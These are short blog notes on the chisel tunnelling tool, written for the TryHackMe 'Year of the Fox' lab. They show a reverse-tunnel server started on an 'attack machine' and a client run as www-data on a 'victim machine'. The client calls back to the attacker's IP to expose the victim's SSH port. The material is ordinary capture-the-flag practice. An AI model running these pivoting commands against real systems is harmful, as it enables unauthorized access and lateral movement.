Skip to main content

chisel: Notes

chisel - Source: https://github.com/jpillora/chisel

Chisel on GitHub: https://github.com/jpillora/chisel

Chisel is written in Go.

Start chisel server on kali attack machine

root@X220:~# ./chisel server -p 8000 --reverse
2021/04/14 18:45:55 server: Reverse tunnelling enabled
2021/04/14 18:45:55 server: Fingerprint KL0WyhmdH+DdiSiBnHkqRFZ9AC7azAWqL+NBQ1pAmdM=
2021/04/14 18:45:55 server: Listening on http://0.0.0.0:8000

Run chisel client on victim machine to connect and create tunnel on port 22

www-data@year-of-the-fox:/tmp$ ./chisel client 10.8.146.172:8000 R:22:127.0.0.1:22
<./chisel client 10.8.146.172:8000 R:22:127.0.0.1:22
2021/04/14 12:51:33 client: Connecting to ws://10.8.146.172:8000
2021/04/14 12:51:35 client: Connected (Latency 228.164693ms)

Practice

>>> THM | Year of the Fox

Popular posts from this blog

hmailserver: Notes from the field

hmailserver is one of free open source mail servers running on Microsoft Windows operating system.

stegseek: Notes

StegCracker has been retired following the release of StegSeek, which will blast through the rockyou.txt wordlist within 1.9 second as opposed to StegCracker which takes ~5 hours.

Install Microsoft .NET Core SDK

.NET Core Software Development Kit (SDK) is a set of libraries and tools that allow developers to create .NET Core applications and libraries.